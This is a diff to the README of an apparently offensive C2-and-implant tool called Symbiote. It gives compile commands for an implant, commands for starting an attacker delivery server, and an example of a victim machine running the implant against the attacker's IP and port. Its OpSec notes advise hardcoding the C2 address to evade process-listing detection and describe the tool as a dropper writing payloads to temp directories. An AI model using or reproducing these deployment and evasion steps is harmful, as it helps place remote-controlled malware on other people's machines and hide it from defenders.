007Atharvmd/Symbiote/README.md

 gcc implant/implant.c -o implant.exe -lwinhttp -liphlpapi -lshell32
 5. Execution (The Attack)
-Terminal 1: Attacker (C2 Server) Start the delivery server.
+Terminal 1: Attacker (C2 Server) Start the delivery server using your tool.

 Bash

+# Windows
+./symbiote.exe serve --port 8080

+# Linux
-go run main.go serve --port 8080
+./symbiote serve --port 8080
-Terminal 2: Victim (Implant) Run the implant, pointing it to the attacker's IP.
+Terminal 2: Victim (Implant) Run the compiled implant, pointing it to the attacker's IP.

 Bash

 # ./implant <ATTACKER_IP> <PORT>
 ./implant-linux 192.168.1.50 8080
 ⚠️ Operational Security (OpSec) Notes
 Runtime Arguments: Currently, the C2 IP is passed via command line arguments for testing flexibility.
-In a real engagement, this would be hardcoded or patched into the binary to avoid process listing detection (ps aux).
+In a real engagement, this should be hardcoded or patched into the binary to avoid process listing detection (ps aux).

 Disk Drop: This tool acts as a Dropper (writes to %TEMP% or /tmp).
 While this ensures compatibility with complex binaries (ELF/EXE), it is less stealthy than pure in-memory injection.